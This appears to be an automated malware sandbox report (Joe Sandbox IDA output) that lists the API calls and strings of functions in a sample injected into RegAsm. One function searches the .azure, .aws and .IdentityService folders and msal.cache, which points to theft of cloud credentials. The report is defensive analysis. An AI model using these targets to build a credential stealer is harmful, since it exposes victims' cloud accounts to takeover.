winGetTempname2, xrefs: 19DD8094
winGetTempname4, xrefs: 19DD8355
etilqs_, xrefs: 19DD824C
winGetTempname1, xrefs: 19DD817B
winGetTempname5, xrefs: 19DD8233

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: e77c0a81798337cfa6c89dcd7c2b5de8acabfbfa7b2ef558bc087eac3aed2744
Instruction ID: 51db34637320a18b002cd19e7993674b2594783b62c4615dd9c69b65585012cf
Opcode Fuzzy Hash: e77c0a81798337cfa6c89dcd7c2b5de8acabfbfa7b2ef558bc087eac3aed2744
Instruction Fuzzy Hash: 68A19E75A003515BE7029B74EC42BAA7BD99F42311F5C4165EC8D9B6C2E62BA10FC3B2

Uniqueness

Uniqueness Score: -1.00%

Function 004022D0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 63stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,0000000F,00418875), ref: 004022E2
strlen.MSVCRT ref: 00402307
strlen.MSVCRT ref: 00402311
strlen.MSVCRT ref: 0040231B
strlen.MSVCRT ref: 00402323
strlen.MSVCRT ref: 00402340
strlen.MSVCRT ref: 0040234A
strlen.MSVCRT ref: 00402360
strlen.MSVCRT ref: 0040236A
strlen.MSVCRT ref: 00402374
strlen.MSVCRT ref: 0040237E

Strings

Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040235B
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040236F
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402316
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040230C
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 00402333
The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402302
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402345
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402379
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402365

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$AllocLocal
String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
API String ID: 710835760-1224611842
Opcode ID: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction ID: f498ca94b0cf780e3660f044cf5a8bded02fdd4dda412cde648ac572d59e650e
Opcode Fuzzy Hash: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction Fuzzy Hash: DD11E639748220AB8710BEAF9CD3AC9B755AF84704B984067FD18A3282C57D5C4042B9

Uniqueness

Uniqueness Score: -1.00%

Function 00417CE0 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 145stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417D11

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00417D37
lstrcat.KERNEL32(?,\.azure\), ref: 00417D54

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

memset.MSVCRT ref: 00417D93
lstrcat.KERNEL32(?,00000000), ref: 00417DBF
lstrcat.KERNEL32(?,\.aws\), ref: 00417DDC

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,0145F8A0), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

memset.MSVCRT ref: 00417E1B
lstrcat.KERNEL32(?,00000000), ref: 00417E47
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417E64

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

memset.MSVCRT ref: 00417EA3

Strings

Azure\.aws, xrefs: 00417DE2
Azure\.azure, xrefs: 00417D5A
*.*, xrefs: 00417D5F
\.aws\, xrefs: 00417DD0
\.IdentityService\, xrefs: 00417E58
*.*, xrefs: 00417DE7
msal.cache, xrefs: 00417E6F
Azure\.IdentityService, xrefs: 00417E6A
\.azure\, xrefs: 00417D48

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 515946987-974132213
Opcode ID: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction ID: 1b53bb84b6d4d4d6c781053bd63c720a49e678cd70851be9322f010e7c87751d
Opcode Fuzzy Hash: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction Fuzzy Hash: 3051F571900219ABCB14EBA0CC46FED7778AB1C704F64466EBA54631C2EF7C5B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 19D65D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

usermerge, xrefs: 19D65EAD
deletemerge, xrefs: 19D65F64
hashsize, xrefs: 19D65DF0
rank, xrefs: 19D65FBB
pgsz, xrefs: 19D65D81
crisismerge, xrefs: 19D65EF7
secure-delete, xrefs: 19D66031
automerge, xrefs: 19D65E59

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: 06ec2245c182b71dd0338a083831943c36c66227ef99c9f317ba96431a05c9f4
Instruction ID: bb886f2d335a5ae5b4083a48bf2ffda903933885ad30a8a6487159e44848257d
Opcode Fuzzy Hash: 06ec2245c182b71dd0338a083831943c36c66227ef99c9f317ba96431a05c9f4
Instruction Fuzzy Hash: CB7147BAB002115BDB00DE19ED0199F77D5AFC5212F4C0879F943C7AA1FB21E94AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C55E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 19C55E6F
no such fts5 table: %s.%s, xrefs: 19C562EA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C55F2B, 19C56253, 19C56385
recursive definition for %s.%s, xrefs: 19C55E4C
misuse, xrefs: 19C55F35, 19C5625D, 19C5638F
API called with finalized prepared statement, xrefs: 19C55F1F, 19C56247, 19C56379
%s at line %d of [%.10s], xrefs: 19C55F3A, 19C56262, 19C56394

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: 5bdb58b559aa8f1f42c5f8a2e5e845115a737a62d4eb5bfcb2cf199885f99560
Instruction ID: 988d53940e36707a4f444b7fb31c41204e2e0a728f5b472ada804d39d9c5f951
Opcode Fuzzy Hash: 5bdb58b559aa8f1f42c5f8a2e5e845115a737a62d4eb5bfcb2cf199885f99560
Instruction Fuzzy Hash: 4502F276A003419BE711DF24FD84B5B77E4BF94358F084528E8CA97382EB71E504CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00412870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
ExitProcess.KERNEL32 ref: 004128B3
strtok_s.MSVCRT ref: 004128CA

Strings

block, xrefs: 00412893

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction ID: ae6e9dac41f5a43a3b2df2dea02a57a44f9796bfde1c63c592e4e2a6fe63bb36
Opcode Fuzzy Hash: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction Fuzzy Hash: F141E6B1B50342ABDB509F799D04ADB7BA9BF05B04F60062FF502D3684EABC94909B58

Uniqueness

Uniqueness Score: -1.00%

Function 19CC9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 19CC9A04
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CC9A35, 19CC9D90
misuse, xrefs: 19CC9A3F, 19CC9D9A
SELECT %s, xrefs: 19CC99B1
API called with finalized prepared statement, xrefs: 19CC9A19, 19CC9D84
%s at line %d of [%.10s], xrefs: 19CC9A44, 19CC9D9F
no such function: %s, xrefs: 19CC9E8C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: 533ea13b66646aefc236f25938addd87bf0728fbf817c6ae374d1fbd1efcd5fc
Instruction ID: d607c8b219800d61ee318702014d025baa12c13c0037cfd9abde21d682f63397
Opcode Fuzzy Hash: 533ea13b66646aefc236f25938addd87bf0728fbf817c6ae374d1fbd1efcd5fc
Instruction Fuzzy Hash: 7FE114B6A047419BE710CF25E840B9B7BE4BF84755F1C452CE8CA9B381EB35E905C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00413A80 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 210stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413AB3
memset.MSVCRT ref: 00413AC5

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00413AF1
lstrcat.KERNEL32(?,01461D70), ref: 00413B10
lstrcat.KERNEL32(?,?), ref: 00413B24
lstrcat.KERNEL32(?,01461DA0), ref: 00413B38

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01462058,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 004119B0: GlobalAlloc.KERNEL32(00000000,00413BC9,00000000,?,?,00413BC9,?,?), ref: 004119BB

StrStrA.SHLWAPI(00000000,014630B0), ref: 00413BD5
GlobalFree.KERNEL32(00000000), ref: 00413CAA

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrcat.KERNEL32(?,00000000), ref: 00413C4E
StrCmpCA.SHLWAPI(?,00428367,?,?,?,?,000003E8), ref: 00413C6B
lstrcat.KERNEL32(?,?), ref: 00413C86
lstrcat.KERNEL32(?,004286E0), ref: 00413C92

Strings

tA, xrefs: 00413CE4, 00413BF9, 00413C78, 00413BFD, 00413C7B, 00413CE7
tA, xrefs: 00413D14, 00413B66, 00413B6E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID: tA$tA
API String ID: 4228189460-660347137
Opcode ID: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction ID: dee6d321855fcd0dcb4b30ed1074f5a9a8d64092eff38df03ecb134e2f941785
Opcode Fuzzy Hash: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction Fuzzy Hash: 5C71BBB5D00209ABCB10EFA1CC85EEE7779AF58304F10455EF615B3181EB789B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19C83800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

cannot open value of type %s, xrefs: 19C838ED
real, xrefs: 19C83895, 19C838EC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C83930
null, xrefs: 19C838E7
integer, xrefs: 19C8389A
misuse, xrefs: 19C8393A
API called with finalized prepared statement, xrefs: 19C83924
%s at line %d of [%.10s], xrefs: 19C8393F
no such rowid: %lld, xrefs: 19C839F8

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: edbd8dfee7b654ac7c80ee5ef2c68bdad1e182f9d4404e81356d08b38b6ff16d
Instruction ID: d0e6c8e892cbb9ea3bf6a5b011c14d21b62a5eb1c77a94dbbb166001d7f58c2e
Opcode Fuzzy Hash: edbd8dfee7b654ac7c80ee5ef2c68bdad1e182f9d4404e81356d08b38b6ff16d
Instruction Fuzzy Hash: 5A51DFB56043019FD710DF28EC40A56B7A4FF84319F08592DE9968B691EB71E8158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00409840 Relevance: 24.2, APIs: 19, Instructions: 436stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409A72
HeapAlloc.KERNEL32(00000000), ref: 00409A79
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BBF
lstrcat.KERNEL32(000000FF,00427C8C), ref: 00409BCE
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BE1
lstrcat.KERNEL32(000000FF,00427C90), ref: 00409BF0
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C03
lstrcat.KERNEL32(000000FF,00427C94), ref: 00409C12
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C25
